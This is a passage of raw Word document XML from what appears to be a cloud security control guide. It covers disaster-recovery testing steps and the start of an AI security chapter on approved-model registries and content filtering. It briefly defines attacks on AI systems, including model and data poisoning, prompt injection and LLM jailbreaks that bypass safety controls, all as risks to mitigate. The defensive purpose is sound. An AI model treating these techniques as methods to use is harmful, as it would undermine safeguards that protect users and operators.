    <w:p w14:paraId="31F2F3EE" w14:textId="3805DE9A" w:rsidR="00E13D85" w:rsidRDefault="00E13D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="337"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13D85">
        <w:t>Ensure recovered systems support business operations testing application functionality, user access, integration points, and performance requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408E1031" w14:textId="1DE17C74" w:rsidR="00E13D85" w:rsidRDefault="00E13D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13D85">
        <w:t>Test recovery orchestration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7B93EC" w14:textId="3E59DBD4" w:rsidR="00E13D85" w:rsidRDefault="00E13D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="337"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13D85">
        <w:t xml:space="preserve">Validate recovery runbooks, automation scripts, and orchestration workflows </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E13D85">
        <w:t>ensuring</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E13D85">
        <w:t xml:space="preserve"> smooth execution during actual disasters without manual intervention errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB059F0" w14:textId="4828942A" w:rsidR="00D300A2" w:rsidRDefault="00D300A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D300A2">
        <w:t>Continuous improvement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521BF052" w14:textId="777E2566" w:rsidR="00D300A2" w:rsidRDefault="00D300A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D300A2">
        <w:t>Document lessons learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3610A1D4" w14:textId="5FA7FB2E" w:rsidR="00D300A2" w:rsidRDefault="00D300A2" w:rsidP="00D300A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
      <w:r w:rsidRPr="00D300A2">
        <w:t>Capture issues, inefficiencies, and improvement opportunities identified during recovery testing creating action items for procedure enhancement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E51025" w14:textId="204C7ADA" w:rsidR="00D300A2" w:rsidRDefault="00D300A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D300A2">
        <w:t>Update recovery procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1076D3DB" w14:textId="32CE3BC1" w:rsidR="00D300A2" w:rsidRDefault="00D300A2" w:rsidP="00D300A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
      <w:r w:rsidRPr="00D300A2">
        <w:lastRenderedPageBreak/>
        <w:t>Incorporate lessons learned from recovery tests into documented procedures ensuring continuous improvement of recovery capability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235E03DE" w14:textId="77777777" w:rsidR="00D300A2" w:rsidRDefault="00D300A2" w:rsidP="00D300A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A34126C" w14:textId="77777777" w:rsidR="00D300A2" w:rsidRDefault="00D300A2" w:rsidP="00D300A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571DE610" w14:textId="77777777" w:rsidR="00D300A2" w:rsidRDefault="00D300A2" w:rsidP="00D300A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560352BA" w14:textId="7A307762" w:rsidR="00D300A2" w:rsidRDefault="00D300A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D300A2">
        <w:t>Train recovery teams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBE025D" w14:textId="54F8850E" w:rsidR="00D300A2" w:rsidRDefault="00D300A2" w:rsidP="00D300A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
      <w:r w:rsidRPr="00D300A2">
        <w:t>Use recovery testing as training opportunity ensuring team members gain practical experience with recovery procedures reducing errors during actual disasters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14152A30" w14:textId="22B0A528" w:rsidR="00D300A2" w:rsidRDefault="00D300A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D300A2">
        <w:t>Refine RTO/RPO targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA8E8A6" w14:textId="6677C5DB" w:rsidR="00D300A2" w:rsidRPr="008870BC" w:rsidRDefault="00D300A2" w:rsidP="00D300A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
      <w:r w:rsidRPr="00D300A2">
        <w:t>Adjust RTO and RPO objectives based on actual recovery capabilities identified through testing ensuring business expectations align with technical reality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E84AEFF" w14:textId="77777777" w:rsidR="00AA1FA6" w:rsidRDefault="00AA1FA6" w:rsidP="00AA1FA6"/>
    <w:p w14:paraId="037802A3" w14:textId="77777777" w:rsidR="00AA1FA6" w:rsidRDefault="00AA1FA6" w:rsidP="00AA1FA6"/>
    <w:p w14:paraId="66212AAC" w14:textId="77777777" w:rsidR="00AA1FA6" w:rsidRDefault="00AA1FA6" w:rsidP="00AA1FA6"/>
    <w:p w14:paraId="05265650" w14:textId="77777777" w:rsidR="00AA1FA6" w:rsidRDefault="00AA1FA6" w:rsidP="00AA1FA6"/>
    <w:p w14:paraId="6C0B460D" w14:textId="77777777" w:rsidR="00AA1FA6" w:rsidRDefault="00AA1FA6" w:rsidP="00AA1FA6"/>
    <w:p w14:paraId="0BD6619F" w14:textId="77777777" w:rsidR="00AA1FA6" w:rsidRDefault="00AA1FA6" w:rsidP="00AA1FA6"/>
    <w:p w14:paraId="54EEC8B0" w14:textId="77777777" w:rsidR="00AA1FA6" w:rsidRDefault="00AA1FA6" w:rsidP="00AA1FA6"/>
    <w:p w14:paraId="3DA490F4" w14:textId="77777777" w:rsidR="00AA1FA6" w:rsidRDefault="00AA1FA6" w:rsidP="00AA1FA6"/>
    <w:p w14:paraId="1BB8E63C" w14:textId="77777777" w:rsidR="00AA1FA6" w:rsidRDefault="00AA1FA6" w:rsidP="00AA1FA6"/>
    <w:p w14:paraId="712BAE88" w14:textId="5A5C8E45" w:rsidR="003B5F59" w:rsidRPr="00E53977" w:rsidRDefault="003B5F59" w:rsidP="003B5F59">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc242449580"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Artificial Intelligence Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w14:paraId="1E17FA20" w14:textId="31428681" w:rsidR="003B5F59" w:rsidRPr="00E53977" w:rsidRDefault="003B5F59" w:rsidP="003B5F59">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc242449581"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>AI Platform Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w14:paraId="7F9F4507" w14:textId="384CD71E" w:rsidR="003B5F59" w:rsidRPr="00E53977" w:rsidRDefault="003B5F59" w:rsidP="003B5F59">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc242449582"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>AI-1: Ensure use of approved models</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w14:paraId="5AB8954A" w14:textId="2E2C049F" w:rsidR="003B5F59" w:rsidRPr="00E53977" w:rsidRDefault="003B5F59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246E6535" w14:textId="0A651FEF" w:rsidR="003B5F59" w:rsidRPr="00E53977" w:rsidRDefault="003B5F59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7491ED4D" w14:textId="38F31926" w:rsidR="00DE50B1" w:rsidRPr="00E53977" w:rsidRDefault="00DE50B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Supply chain attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A557846" w14:textId="36A065D8" w:rsidR="00DE50B1" w:rsidRPr="00E53977" w:rsidRDefault="00DE50B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Third-party components, datasets, or pre-trained models targeted by adversaries introduce vulnerabilities or backdoors that compromise model security, reliability, and the integrity of downstream applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5BE19A" w14:textId="46F3B171" w:rsidR="00DE50B1" w:rsidRPr="00E53977" w:rsidRDefault="00DE50B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deployment of compromised or malicious models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E21F4E0" w14:textId="4086671D" w:rsidR="00DE50B1" w:rsidRPr="00E53977" w:rsidRDefault="00DE50B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lack of model traceability and accountability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28762717" w14:textId="0B1F8527" w:rsidR="00DE50B1" w:rsidRPr="00E53977" w:rsidRDefault="00DE50B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK / ATLAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C83E155" w14:textId="0CED8B70" w:rsidR="005E2D78" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Poison AI Model (AML.T0018.000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB0E4A4" w14:textId="0C9AE861" w:rsidR="004F4D04" w:rsidRPr="00E53977" w:rsidRDefault="004F4D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="449"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4D04">
        <w:t>Adversaries manipulate an AI model's weights to embed backdoors or change behavior, modifying neural network weights to include triggers that leak data or manipulate outputs when activated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE6A2DA" w14:textId="3DD46A5C" w:rsidR="005E2D78" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Poison Training Data (AML.T0020)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A8A28B" w14:textId="085D90A6" w:rsidR="004F4D04" w:rsidRDefault="004F4D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="449"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4D04">
        <w:t>Adversaries introduce malicious data into training datasets to manipulate model behavior, causing the model to produce incorrect outputs, embed backdoors, or leak sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B3073C" w14:textId="77777777" w:rsidR="004F4D04" w:rsidRPr="00E53977" w:rsidRDefault="004F4D04" w:rsidP="004F4D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57856216" w14:textId="01FFDDEF" w:rsidR="005E2D78" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Supply Chain Compromise (T1195)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749F4C02" w14:textId="69934722" w:rsidR="004F4D04" w:rsidRPr="00E53977" w:rsidRDefault="004F4D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="449"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4D04">
        <w:t>Adversaries compromise AI components like libraries or datasets, injecting malicious code to manipulate model behavior or gain access when integrated into supply chains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D7CEFD" w14:textId="271A16A4" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78" w:rsidP="005E2D78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AI-1.1: Ensure use of approved models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B12FA8" w14:textId="390C33A5" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy centralized model registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6160448C" w14:textId="6DFF64A6" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Establish a single source of truth for tracking model origin, verification status, and approval history using Azure Machine </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Learning model registry to maintain metadata on model provenance, security scanning results, and deployment authorizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52306658" w14:textId="77777777" w:rsidR="00B310D6" w:rsidRPr="00E53977" w:rsidRDefault="00B310D6" w:rsidP="00B310D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305A142D" w14:textId="69A103C4" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Integrate automated security validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA6C1E9" w14:textId="1F5FCD2A" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enforce role-based access control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B80E402" w14:textId="5F182BB2" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establish approval workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31448951" w14:textId="0C25A025" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Design multi-stage approval processes requiring security team review of model scanning results, validation of training data provenance, and business owner sign-off before production deployment authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E57EB" w14:textId="4534068A" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Maintain audit trails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCBE266" w14:textId="72D86046" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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120" w:name="_Toc242449583"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>AI Application Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="4A036A27" w14:textId="5804A758" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78" w:rsidP="005E2D78">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc242449584"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>AI-2: Implement multi-layered content filtering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w14:paraId="762B2C62" w14:textId="36D5E4DE" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681F657E" w14:textId="30C54C3A" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18DFDD16" w14:textId="38507998" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Prompt injection attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28678B18" w14:textId="108B59EB" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Malicious prompts crafted to manipulate AI models into generating harmful outputs, leaking sensitive information, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>executing unauthorized actions bypass input validation and compromise system integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCDBE37" w14:textId="59EEE283" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Harmful content in inputs and outputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1DC1F3" w14:textId="1FF26E8F" w:rsidR="005E2D78" w:rsidRPr="00E53977" w:rsidRDefault="005E2D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Data poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC2142" w14:textId="5EFBEC56" w:rsidR="00577387" w:rsidRPr="00E53977" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATLAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3D177D" w14:textId="646238A2" w:rsidR="00577387" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Prompt injection (AML.T0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDF2EE8" w14:textId="53F01396" w:rsidR="004F4D04" w:rsidRPr="00E53977" w:rsidRDefault="004F4D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="450"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4D04">
        <w:t>Crafting malicious prompts to produce harmful outputs or bypass security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074B370A" w14:textId="6B1EF25D" w:rsidR="00577387" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>LLM jailbreak (AML.T0013)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4926578B" w14:textId="572B5D6E" w:rsidR="004F4D04" w:rsidRPr="00E53977" w:rsidRDefault="004F4D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="450"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4D04">
        <w:t>Bypassing LLM security controls with crafted prompts to elicit harmful or unauthorized responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD4607F" w14:textId="378643E7" w:rsidR="00577387" w:rsidRDefault="00577387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
